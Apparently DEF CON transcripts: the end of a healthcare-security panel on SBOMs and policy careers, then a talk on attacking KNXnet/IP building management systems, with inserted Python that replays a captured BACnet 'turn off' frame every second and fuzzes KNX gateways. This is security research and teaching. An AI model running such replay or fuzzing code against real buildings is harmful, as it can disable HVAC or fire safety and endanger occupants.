Your customers are now like, yeah, you've got to fork it over. So for me, it's been kind of fun and a little bit funny to watch a lot of the debate that's going on with software bill of materials, to Stephanie's point about, oh, should we do this or should we not do this? I'm like, well, I really don't think that's the question anymore. Either because your contract says you must, or because a bunch of federal agencies say you must, you're going to have to do this. So my recommendation, to the extent that anybody is asking me: seize your own destiny, become very good at software bill of materials very fast, because you're going to have to do it one way or the other. I mean, we could easily have an entire panel on SBOM, so I won't repeat most of those points. But there are a bunch of common, often good-faith concerns about it. Many of them have fantastic answers at ntia.gov/SBOM. There's an FAQ. There's a myth-busting type set of resources. And some of them are genuine concerns like, won't this be a roadmap to the attacker? And we have a phenomenal answer about why it's more often a roadmap to the defender. And people keep saying that hospitals could never use this, that it's going to be work they can't afford, and they're on camera and on record begging for it. So for people who hate FUD, we should stop purveying it. If you have questions, there are usually great answers to them, and they're usually documented. And then, to the executive order, maybe to pivot to the end of this part: what do we care about as a hacker community? What are our values? Because I love that the executive order started with a value statement. My favorite sentence is: in the end, the trust we place in our digital infrastructure should be proportional to how trustworthy and transparent that infrastructure is, and to the consequences we will incur if that trust is misplaced. So this doesn't say that an ingredients list on food stops health problems or junk food. It doesn't stop anything, but it's part of a regime of transparency and trustworthiness. And for those who say the software bill of materials isn't proven until we have ten years of study: this is a practice borrowed from Deming in the 40s for automotive, then it went into all of manufacturing, and now it's in chemicals and food. Bills of materials are proven. It's about time we embrace them. Software BOMs aren't going to be any different. The growing pains are really going to come from the fact that we have a lot of technical debt and people are afraid to reveal their technical debt. But as we start identifying and paying down some of that technical debt, we're going to wonder why we never had these before. These are all fantastic points. I'll also just say, one of the biggest concerns we have now, among the common talking points around healthcare cybersecurity, is this concern for legacy devices and how, looking back, we don't know what vulnerabilities exist. We don't even have good understanding or visibility into that. Well, guess what: today's cutting-edge medical devices are the legacy devices in five years. And so we need to get ahead of that by five or ten years. At some point, the current generation of medical devices will become legacy devices, and knowing what's under their hood will help us in the future. We have to start that now.
I wish we had started it 20 years ago and a lot of the concerns around legacy medical devices and what's vulnerable, what isn't, and what we can worry about that lead to some of the most harrowing stories about cybersecurity vulnerabilities and medical devices would have been alleviated to some degree by software bill materials if we had done it sooner. So, you know, really an important thing for us to get started sooner rather than later because the return on investment only gets better as these devices age. And so great. Anything else on software bill materials before Jeff takes us to our next question? Yeah, and I think we're actually running up against the hour here. So this will probably be the final question. I think just by the nature of how complex this entire topic is, we can kind of easily trend towards some of the more inside baseball aspects of this. So I think it's really important that we've hit on things like Sbomb. But I do kind of want to bring it back as we close to this idea, Christian, that you and I and the others who started this kind of brought to the table, which was we want somewhere that the average DEF CON attendee can come and learn about healthcare, security, how they can get involved. And so I kind of want to say we do a lot of admiring the problem. Things like Sbombs are definitely steps in the right direction towards solutions. But for the average person with no real background in this, I kind of want to understand how the panel thinks that they may be able to help out because we actually do need everybody and anybody who's willing to contribute to these issues. And so I want to break this into kind of two groups of people to ask the question. And first, I want to start with Gabb, who has, you know, one of the most interesting career arcs with respect to all of the spaces she's been in and how her journey has taken her and ended up at this point, what her advice would be to somebody who's maybe insecurity, maybe like hacking, how they can kind of combine interests and the desire to help with healthcare. And then sort of move through Stephanie, but then end up with, with Josh and Jessica, you know, not everybody is going to be able to testify before Congress on some of these issues, not everybody is going to be at some of these high level discussions. But how can the average hacker get involved in the policy mechanisms? How can they contribute to some of these initiatives and what your advice would be? So long question there, but let's start with Gabb say like somebody shows up at, you know, Harmon Person in Vegas and says, Hey, this is awesome. How can I get involved? What's your advice for me? Yeah. So I was thinking back to, because it was only a couple of years ago that I actually made the career switch and just trying to think like, well, what would I tell my former self to do? And a lot of it was just, I guess, be a little bit more proactive as to the research I was doing and trying to understand the entire, the big picture. It's not just the software of the device or the hardware of the device. It also plays into how it's used that threat landscape. And even the policy side of things, the just knowing, you know, what parameters it has to adhere to, what, what specifications it's supposed to meet, things like that. I think we're really helpful in kind of understanding that entire big picture of medical device research and just getting your hands on as much information as possible. Awesome. 
And so I'd follow that with: if you're in the security space and you're looking at the medical device space and thinking to yourself, I would just love to make an impact here, I think there are a couple of big ways for security people to do that. One, help medical device manufacturers: work for them. They all have open job recs. But if you're trying to say, how can I come in and make an impact in this space, one of the really underserved areas I always see is standards and regulatory working groups. And I'll be the first to say it's not sexy. It's boring, a lot. It's super boring. You're sitting through hours listening to arguments about where commas should be placed. But at the end of the day, those standards and those regulations that are coming out are guiding the future of the industry. And they absolutely need subject matter experts in security to sit through those arguments about where commas should be, so that at the end of the day the technology recommendations, the technology requirements inside of those guidance documents are actually ones that align with the unique needs of the medical device space and actually meet industry and security best practices. So it is not sexy. I will tell you, it is boring. But if you were sitting there thinking, I have a lot of security knowledge and I want to make a big impact in the healthcare space: absolutely join working groups, absolutely join standards and regulatory groups that are trying to push the industry forward. That is a huge area where you can have an impact. Josh, how about you? I would say great answers. I do think the quote I was being prompted with earlier is that I often say to policymakers: through our over-dependence on undependable things, we've created the conditions such that the actions of any accident or adversary can have a profound impact on public safety and national security, something along those lines. So it is really about the relationship between how dependent we are and how dependable those things are. So, pivoting off that great recommendation: a ton of these medical device makers are hiring. Some of these hackers are not just reporting to them, they are working for them, on large and growing teams. There are 10,000 medical device makers creating the next wave of medical breakthroughs, and only about 100 of them are large; the rest of them are tiny. So they really do need help and advice and scalable ways to do threat modeling or build less brittle devices. The hospitals need a ton of help too, and they just don't have the resources. So I'm getting to the point where I'm getting really disgusted with the notion of "they should just do zero trust" or "they should just do MFA" or "they should just do best practices." They just can't do "just" those things. So at least one of the ways I'd like to embrace the talent pool here at DEF CON is that I pushed really hard for a few new things: the use of end-of-life software in support and service of national critical functions is dangerous, and it is especially dangerous when it's exposed to the internet. So is the use of hard-coded or default maintenance passwords exposed on the internet. You'll be happy to hear this: we have a document coming out about getting your stuff off search.
So if you're exposed on something like Shodan or Censys.io or the other tools for finding connected devices, we want to start becoming more practical and pragmatic, so that without huge budgets, right now, we can at least remove some of the most egregious elective attack surface called out in the brand new guidance we just released. So those are things we can do, but we have to meet people where they are. I don't know how much this helps, but you know, I don't think I've said this yet: before I worked at FDA, I worked for Congress. I worked for the Energy and Commerce Committee. And I was the tech-to-English dictionary. I was like the walking tech-to-English dictionary: when people were like, we don't know what these words mean, we don't know what this concept is, I'd be like, okay, I'm going to explain this. And that was my job. And Congress needs that a lot. So for those of you who think maybe it would be interesting to get involved in the federal government: one, FDA always needs people. If you like the idea of pulling apart medical devices and getting to determine whether or not they're secure, come apply to be a reviewer at FDA and get to determine whether or not a medical device gets to go onto the market because of its good or bad cybersecurity. But you can also go to Congress. There's something called techcongress.io. They bring in somewhere between 10 and 20 fellows every year and place them in congressional offices. You become that office's technical expert. And people have gone on to do great things from the TechCongress fellowship; a lot of them have stayed in Congress and done just a lot of amazing work. And so if you think policy is something that you want to do: pick your agency, pick your branch of government, and go. We need all the help that we can get. So jump in, we're ready. Well, thank you again to all of our panelists for joining. I wish we had three or four hours to talk about all this stuff, at which point I'm sure all of you would hate me for keeping you here that long. This is just one of many conversations we've had. If you're interested in more of this, all of our prior D0 N0 H4RM panels have been recorded and are available on the DEF CON YouTube channel. And then for those of you who are going to be in person at DEF CON, vaccinated and masked, we'll be having a live, in-person D0 N0 H4RM this DEF CON as well. And with that, we want to say thank you to all of our panelists. Jeff and I are going to clap for you guys. Come on, you got this. Thank you so much. We love you all, and you all are brilliant. We love all of you every time we speak with you. Stay safe. Stay distanced. Stay masked and get vaccinated if you can. And with that, D0 N0 H4RM: another one in the bag. Thank you, everybody. Take care. One last final shout out. We can't end this without giving mad props to the Biohacking Village. And it's a little bit anachronistic because I think it'll be over by the time you're listening to this video, but anybody who wants other resources, or inspiration, or just an incredible experience: add them to your future DEF CON plans, because they're incredible. Thanks, everybody. Really appreciate it. Stay safe.
|
Mired in the hell of a global pandemic, hospital capacity stressed to its limit, doctors and nurses overworked and exhausted... surely the baddies would cut us a little slack and leave little 'ol healthcare alone for a bit, right? Well, raise your hand if you saw this one coming. Another year of rampaging ransomware, of pwned patient care- only this time backdropped by the raging dumpster fire that is COVID. Can we once and for all dispel with the Pollyannas telling us that nobody would knowingly seek to harm patients? And if we can't convince the powers that be- whether in the hospital C-suite or in DC- that we need to take this $%& seriously now, then what hope do we have for pushing patient safety to the forefront when things return to some semblance of normal? With a heavily curated panel including policy badasses, elite hackers, and seasoned clinicians - D0 N0 H4RM remains the preeminent forum where insight from experts collide with the ingenuity and imagination of the DEF CON grassroots to inspire activism and collaboration stretching far beyond closing ceremonies. Moderated by physician hackers quaddi and r3plicant, this perennially packed event always fills up fast - so make sure you join us. As always- the most important voice is yours.
|
10.5446/54200 (DOI)
|
Hi, I'm Claire Vacherot, and today I'm going to talk about sneaking into buildings using the Building Management System protocol KNXnet/IP. First, a little bit about myself. I started as a software developer, then moved to software security, and then to embedded and industrial device and system security. In my job I also like penetration tests on unusual environments, and by unusual environments I mean, for instance, factories, transportation systems, amusement parks and so on. During these assessments we often face new environments with unknown devices and protocols, and we usually don't know where to start. This is what happened for me with Building Management Systems and KNXnet/IP. Just before we start, a little disclaimer. Both industrial systems and Building Management Systems can be dangerous. They control physical processes, so they may have an impact on people's safety, causing accidents or disabling outlets. So please be careful. During our assessments we usually test on mock environments, or at least environments we control, to avoid unwanted side effects. Now that said, let's talk about Building Management Systems. You may have already heard of them, as this is really not the first talk about Building Management Systems, but I don't feel it's yet time to stop introducing them first, so here we go. Building Management Systems, or Building Automation Systems, are systems that can control every component in a facility, from lighting to security systems, including HVAC, sometimes elevators and so on. As their name suggests, they are used to automate these components and to control them easily, and you can find them in all types of facilities: homes, factories, hospitals and so on. Here is an interesting example from the movie Hackers, which has a BMS hacking scene. The main character hacks into a school's BMS interface and schedules the sprinkler system to run at a certain time, basically for revenge. And this is what happens. I don't know how it was back in 1995, but now, apart from this weird 3D interface, this is quite a workable scenario. We can definitely do this, provided of course that the sprinkler system is linked to the Building Management System. So now let's take a closer look at this technically. In a BMS, the main part is the field part, where the actual components are. We often find three types of components: sensors, actuators and controllers. If we take the example from Hackers, a sensor could be a fire detector, the actuators could be the sprinklers, and so on. These devices communicate with each other using field bus protocols, usually over twisted pairs or radio frequencies. This part can work standalone, and in fact it used to be the only part. But then the field part got connected to the IP network, first because there was that trend to connect everything, but also most probably so that operators could reach and control it more easily. So basically there are additional devices that we'll call IP interfaces, or gateways, or servers, or whatever, and these IP interfaces make a translation between the IP world and the field world. To simplify, the operator just needs to be on the same network as this IP interface to configure and control the field part. In a way, we expose components that used to be reachable only physically to anyone on the network, or even the internet. And that's interesting for us, and we may definitely want to take a look at it from a security point of view.
So in industrial and building management systems, many pieces of software and many protocols were created before we started talking about cybersecurity, or they were created without considering that they may be exposed someday, and they are usually meant to last for a long time. Some of them do cover safety measures, which are preventions against involuntary failures, but they don't cover security issues. They don't cover provoked errors: for instance, they don't prevent forging or replaying packets. And it's also quite common to find configuration flaws on them, such as default credentials, or only one user which is used to run everything on a device and which is root, and so on. So, as you can see, there's a lot to think about when it comes to industrial system and building management system security. But there's more. Let's take an even closer look at the interface between the LAN and the field. It's usually a device in an electric cabinet, which means it's hardly reachable physically, but of course reachable from the LAN. And if you scan one of them, you may notice that several services are running: first the usual stuff for administration, most likely at least HTTP, maybe SSH or others. But you may also notice another port, which is the building management system protocol service. What are they? As I said before, field components communicate with each other using a field protocol. Some of these protocols now have an IP layer, which means that you can contact the interface and field devices directly using the IP version of that protocol, the most common such protocols being BACnet and KNX. So what happens is that the operator will send a BACnet/IP or KNXnet/IP request to the interface, which will interpret it and relay it to the field bus via a field BACnet or field KNX request. And today I want to focus on that part, for several reasons. First, because we already know the other services, and you can at least expect some basic protections from the vendor there, which is not necessarily true for the BMS protocol. More importantly, this protocol is a direct way to talk to devices. It's the best way to gather information and to run commands on the BMS. And finally, these implementations have the same flaws as many other industrial components: they did not consider cybersecurity, and a lot of them were written a long time ago and never updated since then. So what do we have so far? We have field devices and protocols that should not be exposed, and we know that they actually are and that we can reach them via IP interface devices. We also know that there's this IP version of a field protocol no one has heard of before to do that. And finally, we know that we can talk to devices directly using that IP version of a BMS protocol through that IP gateway. Yeah. What can we do with that? In the next few slides I talk about two general attack scenarios on building management systems: the first one consisting of sending valid stuff to the IP interface using the BMS protocol, and the second one consisting of sending invalid stuff, which is brilliant, I know. So let's talk about the first one, which is the most obvious one. Here we want to send legitimate commands to change the BMS behavior. If we go back to the example from Hackers, we could for instance enable the sprinklers, which may or may not be fun depending on the situation. We could disable the fire detection, which is not fun at all. In a trickier way, we could also change thresholds.
For instance, by setting the smoke detector thresholds higher, by the time an alert is triggered it may already be too late, which is still not fun. Or you can just do whatever you want, as long as it's allowed by the system, and this is very important. And why can we do that? Because, as I mentioned before, these protocols do not cope with cybersecurity. There is no protection against replay or anything like that, and often no authentication, or at least no authentication by default. So here is a small example I did a few months ago. This is an HVAC system in a test environment which can be controlled with BACnet. I had no idea what was inside the BACnet protocol, but just by listening to the traffic and extracting the right frame, I was able to make it unavailable. This is the script I used. It just replays the command to turn the system off every second, and that's enough. Doing this in a real environment could have a really bad effect. For instance, in a data center without the HVAC, the servers would just cook to death. Also, in buildings made entirely of glass, what happens if you turn the HVAC off? Also, imagine in Vegas. And as for the air renewal part, if it's turned off, all the bad things stay in the air, which is really not suitable, especially during a pandemic. So the other scenario is the unintended use of devices through these protocols. In scenario one we run legitimate commands and can only perform expected operations. Here we want to send malicious stuff and wait for something unexpected, most likely something we could exploit. And what makes it possible is, of course, the combination of security issues and devices that we talked about previously. But it's even easier knowing that a lot of BMS IP interfaces run Linux-based operating systems. So here is an example of what you can do. For instance, you can compromise an IP interface exposed on the internet. From there you could gain a foothold in the network and possibly keep it, move somewhere else on that network, or do anything else on that network. An alternative to this scenario could be to use the BMS for network pivoting. For instance, in industrial systems, IT and OT networks should be segregated. They are not always segregated, but at least they should be. Now imagine having a BMS that's connected to both. I'm not saying this is a common setting, but it can definitely happen. So someone who has access to the IT side and wants to move to the OT side would probably consider compromising devices that are connected to both. So this is it for the scenarios. Of course, I didn't invent any of this. If you want to know more about BMS in general, there are already a few conferences and papers. There are also already a few talks about BMS exploitation, and among them I recommend the one by Jesus Molina at DEF CON 22, which talks about abusing a KNX system in a hotel and which is really good. There is also some existing work about advanced testing on BACnet systems, and research about attack detection and remediation on BACnet. But as you can see, this is really all about BACnet, so where is KNX? Actually, the scenarios that we just went through can be applied to any building management system protocol that has an IP layer. So there is of course BACnet, but there is also KNX, and we don't know much about it from an offensive point of view. So, in the context of everything that we've just seen, we're going to focus on that protocol for the rest of the presentation. So let's talk about KNX.
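One quick aside before the KNX part: the replay script described above really is as small as it sounds. A rough sketch of the idea (not the speaker's actual script; the target address is a placeholder, and the frame has to come from your own capture of a test system, for example a single BACnet/IP packet exported from Wireshark):

    # Hedged sketch of the HVAC replay described above; BACnet/IP uses UDP 47808.
    # Only ever run something like this against a lab/test setup you control.
    import socket
    import time

    TARGET = ("192.168.1.20", 47808)            # hypothetical BACnet controller

    with open("captured_frame.bin", "rb") as f:  # the extracted "turn off" frame
        frame = f.read()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    while True:                                  # keep the system off: replay every second
        sock.sendto(frame, TARGET)
        time.sleep(1)

The fact that blind replay works at all is exactly the "no protection against replay, no authentication by default" point made above.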
So, as you already know, KNX is a BMS protocol with an IP layer. It's mostly used in Europe and Asia, whereas BACnet is mostly used in the US. And of course, like the others, you can find it in all types of homes and buildings. For instance, in my office the lights and shutters are operated by KNX. I'd just like to say a few words about its history, because I think it's interesting for understanding some choices they made about the protocol. Basically, it's a merger of three European field protocol standards that had been used since the 80s, and they were merged into KNX in 1999. Then, eight years later, KNXnet/IP was created, and the KNX installation became reachable from the network. And then, six years after that, security came: the first KNXnet/IP security extension came out. Finally, it's important to note that the standard has only been free since 2016, so that's only been five years, which is not that long. But even with the specifications available, they are still pretty hard to use, and I'll get back to that later. There is a bit of external documentation and a little research and work about KNX security. But obviously that does not mean there is nothing to say about it. Actually, there's a lot to say. And the standard has that covered: it says that for KNX, security is a minor concern, as any breach of security requires local access to the network. That does not mean there is nothing about security in KNX. Some vendors implement authentication, not all of them, but this is usually an option, and usually disabled by default. There are also security protections, the extensions I mentioned, which are KNX IP Secure and KNX Data Secure. But once again, these are extensions, add-ons, and you usually have to pay more or buy better devices to have them. So yeah, security is optional. And about the devices exposed on Shodan: I'm not saying that none of them use authentication or the security extensions, I'm just saying that most of them probably don't. But then the standard has that covered too. It says it is quite unlikely that legitimate users of a network would have the means to intercept, decipher and then tamper with KNXnet/IP without excessive study of the KNX specifications. So this is what we call security by obscurity. And that's bad. So: KNX, hold my beer. Now let's get started. Let's start testing KNX. The standard is right about one thing: the protocol is complicated, we have few resources, and it's hard to start testing KNX, really. At least now the specifications are free, and you just need an account on the KNX Association's website. But you also need good nerves, because the specification is 148 PDF files in 10 sections with information spread everywhere. You just don't know where to find what you need, and you can't simply grep for it; that's a nightmare. Most likely you only need Volume 3, but that's still 33 PDF files, with information spread everywhere again. For instance, if you're looking for how to build a request to send a value to an address, you need at least four different PDF files. We don't want to do that. And there's a better way to get things started: we can set up a test environment with tools provided by the KNX Association. We can use KNX Virtual to emulate a KNX environment, which we'll combine with ETS, the official engineering tool used to configure KNX environments.
So you just set up that environment, and then you just have to play with it while listening to the traffic, and you'll learn a lot. This is all virtual, so no side effects here. Also, Wireshark already has a KNXnet/IP dissector, which is really convenient, and I have to say that the code of the dissector is way more understandable than the specifications. Let me show you briefly how it looks. I have a project configured in ETS with lights and switches, loaded into KNX Virtual, and we can see that if I click on the buttons it turns the lights on and off. So that's a very straightforward setup, but it's already enough to learn a few things in a safe environment. We can also run diagnostics from ETS and see what happens in Wireshark, and so on. Just before we really start testing KNX, there are a few key concepts I'd like to mention, because they are useful to fully understand what's going on. When an operator pushes a configuration or sends a command, a KNXnet/IP request is sent to the KNXnet/IP interface. This frame may contain only KNXnet/IP-relevant information, or it can embed raw KNX data related to the KNX layer. This KNX data is called cEMI, for Common External Message Interface, and these are independent KNX messages with their own format inside the KNXnet/IP request. This means that they have their own headers, their own types, their own bodies and so on. It also means that we don't have one protocol to test but two, with different impacts depending on the one we target. Finally, a few words about the topology. When you are on the IP layer, of course you use IP addresses, but when you are on the KNX layer there are two types of addresses. The first type is individual addresses, which are used to refer to devices, and the other is group addresses, which refer more to functions. So it's not a collection of devices, but rather a collection of actions that devices can perform. For instance, we can imagine that the fire detector and the sprinkler subscribe to the same group address. When there's a fire, the fire detector sets the value 1 on the group address associated with it, and when that group address has the value 1, the sprinkler just starts to sprinkle. I know it's a bit hard to understand, but it comes with practice, trust me. And that's all we need to know for now; now we can really start testing. There are already a few tools that we can use to do that. First, of course, ETS. knxmap is also a great tool if you want to discover devices and interact with them. Let me show you quickly: you can just use knxmap to scan IP interfaces on the network. And you can see that we don't need to know much about KNX to use knxmap, which is cool. We can also see in Wireshark that a lot of things happen: first we see that we need to send a KNXnet/IP request, a tunneling request carrying a cEMI, and so on, but we'll get back to that later. So there's knxmap, but there's also the KNXnet/IP layer for Scapy, which was written by my colleague Julien Bedel. It's not yet in a release, but it's at least merged into Scapy's master branch, so you can already use it. So thanks to Julien, and thanks to the Scapy maintainers for that. Both Scapy and knxmap are suitable for basic interaction. However, when I wanted to start using them for my own tests, I encountered some limitations. First, knxmap is great if you don't know the protocol, but I could not use it to craft invalid frames.
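As a side note on what these frames actually look like on the wire, here is a minimal hand-built KNXnet/IP exchange (a sketch added for illustration, not from the talk; the gateway address is a placeholder):

    # Hedged sketch: hand-built KNXnet/IP DESCRIPTION_REQUEST (service 0x0203).
    # KNXnet/IP gateways listen on UDP/3671; the IP below is an assumption.
    import socket
    import struct

    GATEWAY = ("192.168.1.10", 3671)   # hypothetical KNX IP interface

    # KNXnet/IP header: header length (0x06), protocol version (0x10),
    # service type identifier, total frame length.
    def knxnetip_header(service_type: int, body: bytes) -> bytes:
        return struct.pack("!BBHH", 0x06, 0x10, service_type, 6 + len(body))

    # HPAI (Host Protocol Address Information): structure length, protocol code
    # (0x01 = IPv4/UDP), IP address, port. 0.0.0.0:0 asks the gateway to reply
    # to the packet's source address, which many gateways accept.
    hpai = struct.pack("!BB4sH", 0x08, 0x01, socket.inet_aton("0.0.0.0"), 0)

    frame = knxnetip_header(0x0203, hpai)          # DESCRIPTION_REQUEST
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(2)
    sock.sendto(frame, GATEWAY)
    try:
        data, _ = sock.recvfrom(1024)
        print("DESCRIPTION_RESPONSE:", data.hex())  # device info, supported services
    except socket.timeout:
        print("No answer (wrong host, filtered port, or HPAI rejected)")

Every KNXnet/IP frame starts with that same six-byte header, and tunneling requests simply carry a cEMI frame as their body; that structure is what the crafting and fuzzing discussed below plays with.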
Back to the tooling: I could not easily modify knxmap's code to send malformed requests without rewriting parts of it, because it handles errors, which is a good practice, but for fuzzing that's exactly what we don't want. For Scapy, it's the opposite: you can't really use it if you don't know the protocol in detail, but you can definitely use it to craft invalid frames. However, they can become really complicated, especially when they embed cEMI frames, and IP interfaces are usually very strict regarding the format, so when you fuzz you have to fuzz specific fields, which can become really complicated, and the syntax can be really tough. So obviously, when nothing suits my needs, it's time to write a new tool. Now I'm going to talk about BOF, a tool we wrote when I started using and testing KNXnet/IP devices. BOF is a Python 3 library that we wrote to discover, interact with and test devices that use industrial network protocols. I first created it for KNXnet/IP, but we can add other protocols; for instance, we are currently adding Modbus support. It is a library, so it's mostly meant for writing attack scripts to change device behavior, or to test protocol implementations on devices. So if you recall the attack scenarios I talked about earlier, sending valid frames and sending invalid frames to KNXnet/IP devices, BOF has been written to do both. No joke. If you want to take a look at it, it's available on the Orange Cyberdefense GitHub. To be honest, I wrote it for my own needs first, and I use it during pen tests for discovery and to send commands. But I also use it for vulnerability research on protocol implementations on devices. So I use BOF to write dumb and not-so-dumb fuzzers, let's say smart-ish ones, and I'll give you an example of that soon. The further I go in my research, the more features I add to BOF to ease testing, so hopefully it's getting better and better. Before I show you how to use BOF for discovery and testing, just a quick word about BOF's internals, which I think is interesting. The first version of BOF relied on JSON files for protocol implementations, because it was easy to add and change things in a protocol. But at one point we hit too many limitations. When I first presented BOF I was asked, why not use Scapy? Which is actually a good question, and I was like, hmm, now that you mention it... So, long story short, we ended up using Scapy to handle the protocol implementations, but internally there's a wrapper around it in BOF so that we don't lose some of BOF's capabilities that were not compatible with Scapy's behavior. However, we still let the user access the Scapy object directly within BOF if she wants. If you want to know more about that, we detail how and why we did it in the documentation. Now, back to using BOF. As I mentioned before, BOF can be used for discovery, basic interaction and advanced testing, so there are three ways to use it. The first is the higher-level one, which requires no knowledge of the protocol: there are simply functions in the library that can be called to perform basic operations on KNX installations. For instance, this is my test setup. Here we want to turn on this light and fan, which are linked to a switching actuator. The actuator is linked to an IP gateway that makes it reachable from the local network, and I'm on that local network, so I can communicate with it using KNXnet/IP. The actuator is subscribed to group address 1/1/1 for the light and fan switching operations, both of them.
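For reference, and independent of any particular tool: a three-level KNX group address such as 1/1/1 is packed into 16 bits as 5/3/8 bits of main/middle/sub group, which is what ends up in the destination field of the cEMI frame. A tiny sketch (standard KNX addressing, not code from the talk):

    # How a three-level group address like 1/1/1 maps to the two bytes on the wire.
    def encode_group_address(main: int, middle: int, sub: int) -> int:
        return (main << 11) | (middle << 8) | sub

    def decode_group_address(raw: int) -> str:
        return f"{raw >> 11}/{(raw >> 8) & 0x7}/{raw & 0xFF}"

    print(hex(encode_group_address(1, 1, 1)))  # 0x901
    print(decode_group_address(0x0901))        # 1/1/1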
When it's switched off, the value is zero, and when it's switched on, it's one. So if I write the value one to group address 1/1/1 using the group write function, we can see that something happens. Then there's an intermediate usage level, which requires some basic knowledge of the protocol. You can do the same thing as in the previous example, but you use this level to have more control over the exchange and the frames you send. So if you want to do the same thing, that is to say, change a value on devices, this is what happens. We send a KNXnet/IP frame to initiate a tunneling connection to the KNX layer. We then send a tunneling request containing a raw KNX frame, a cEMI; here it's an L_Data.req, which will be extracted and relayed to the KNX layer. The server responds with an ACK and also with a confirmation KNX frame, to which we reply with an ACK, because at least my test server gets upset if I don't. And yes, it's UDP. So using BOF, we just write a script that does exactly that. Here the tunneling request is broken down so that you can see what it looks like, but there's also a direct method that can be called to initiate and send a request. The code actually looks like this. So let's try to switch everything on again. Success! If we use the group addresses that are attached to only one object in the KNX configuration, we can also turn objects on and off individually. Oh, and also, something went wrong when we were setting up the demo, so let me introduce you to what I think is the first ever KNX-operated gun. And the final level is the one used to build the other ones, and it can be used to change everything in a frame. This is the part I use for fuzzing. Now I'll just show you how to start writing a fuzzer with BOF. We won't talk about the results, because this is not yet another conference about how we fuzzed something to find buffer overflows, although BOF can be used to do that. And KNX IP interfaces usually run a Linux-based OS with services written in C or other compiled languages, so it's definitely something that can happen. But back to our fuzzer: here I chose to mutate another type of frame, because fuzzing tunneling requests would just write bad configurations to the KNX devices, so that's not the best way to start, I guess. So I want to mutate a configuration request. This means I have my base frame, and I wrote a generator function that sets a random value on a random field in the frame. I can't just fuzz the whole frame, because if the frame is not valid it will be rejected by the IP interface before it's even processed, and here we don't want that, because we are trying to cause errors while our frames are being processed. So I have to mutate only specific fields, not all of them, because some of them must remain valid for the request to be accepted. The rest of the code handles the exchange, with a process similar to the tunneling request, with the ACK and all, and it sends my mutated KNXnet/IP frames. Some of them may trigger unexpected behaviors, which we'll want to investigate further afterwards. Here we first want to know which fields triggered a handled error, to exclude them later from the final results. And we also want to know which fields triggered timeouts, that's to say frames that did not get an answer. Those are the most interesting ones for us. So let's run it on a test device. You can see on Wireshark that a lot of packets are being sent and received. At some point we already have some results; all of them are timeouts.
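Stepping back for a second, the skeleton of that kind of field-aware mutation loop looks roughly like this, independent of any particular library (a sketch; the field table below matches the simple DESCRIPTION_REQUEST from earlier, not the configuration request used in the talk, and the target address is a placeholder):

    import random
    import socket

    TARGET = ("192.168.1.10", 3671)   # hypothetical KNX IP interface

    # Minimal valid frame reused as a base; in practice you would start from a
    # capture of the request type you actually want to mutate.
    BASE = bytes.fromhex("06100203000e0801000000000000")

    # Fields the fuzzer is allowed to touch: name -> (offset, length).
    FIELDS = {
        "protocol_version": (1, 1),
        "total_length":     (4, 2),
        "hpai_length":      (6, 1),
        "hpai_protocol":    (7, 1),
    }

    def mutate(base: bytes):
        name = random.choice(list(FIELDS))
        offset, length = FIELDS[name]
        value = bytes(random.randrange(256) for _ in range(length))
        frame = bytearray(base)
        frame[offset:offset + length] = value
        return name, value.hex(), bytes(frame)

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(1)
    timeouts = []
    for _ in range(200):
        name, value, frame = mutate(BASE)
        sock.sendto(frame, TARGET)
        try:
            sock.recvfrom(1024)            # any answer, even an error, means "handled"
        except socket.timeout:
            timeouts.append((name, value, frame.hex()))

    for name, value, frame in timeouts:
        print(f"no answer when {name}={value}: {frame}")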
Back to the run: for each result I have the name of the field and the value that were mutated, as well as a view of the complete frame. The results show that frames with certain values in certain fields did not get a response from the test device. Here we have six results, which means we have six potentially problematic fields that we'll want to investigate. But at that point there's one question: how do we know whether the device rejected the frame or crashed while processing it? And the answer is, with only this, we don't. We could send an additional frame to check whether the device simply stopped responding, but even when the device keeps responding, that does not mean there was no crash. So the next thing to do is to attach a debugger on the device and keep testing. But what do we expect to find then? First of all, we expect to find crashes, that's to say situations where what we sent is not handled correctly, and which we can investigate and eventually exploit. Depending on where the crash occurs, it may mean different things. If it's anywhere in the KNXnet/IP frame, we can suspect that the service, or any other software interpreting the frame, crashed, and that we could use it to possibly compromise the IP interface itself. If the error is in the KNX frame instead, the crash may also have occurred in the KNX layer of the IP interface, again leading to the interface being compromised, but it may also be on the devices themselves. However, that has never happened to me so far, so I might even be lying to you right now. But investigating this is exciting anyway. So, it's time to wrap things up. We have seen that there's a lot to do on BMS and KNX security. What we have so far are environments that control important stuff but where security is a minor concern. For now we don't need to go really deep into hacking techniques, as there are no protections to bypass, or very few of them. But even where there are, can we consider that building management systems that use KNX are secure? Beyond just abusing such systems, we can go further, and there are a lot of research subjects left to work on here: for instance, finding out what's really inside widely used implementations and what we can do with them, or what's inside the KNX security extensions, or even how to secure a BMS efficiently and how to make sure it is actually secure. Until then, there are a few things we can already do to make things better. First, a quick message to vendors and users: stop assuming it's the other's problem. You both have your part to play. Vendors, please at least make sure that secure settings are the default settings. Users, check your settings and segregate your networks, or at the very least don't expose your devices on the internet. And for us, we have a brand new attack surface, so let's test it; maybe someone will learn something. Just be careful when you do, and test in controlled environments. As for defenders: lucky you, you get a brand new defense surface. So that's all for me. I hope you enjoyed the presentation. Thank you for listening.
|
Building Management Systems control a myriad of devices such as lighting, shutters and HVAC. KNX (and by extension KNXnet/IP) is a common protocol used to interact with these BMS. However, the public's understanding and awareness is lacking, and effective tooling is scarce all while the BMS device market keeps on growing. The ability to craft arbitrary KNXnet/IP frames to interact with these often-insecure BMS provides an excellent opportunity in uncovering vulnerabilities in both the implementation of KNX as well as the protocol itself. From unpacking KNX at a lower level, to using a Python-based protocol crafting framework we developed to interact with KNXnet/IP implementations, in this talk we’ll go on a journey of discovering how BMS that implement KNXnet/IP work as well as how to interact with and fuzz them. After this talk you could also claim that “the pool on the roof has a leak”!
|
10.5446/54204 (DOI)
|
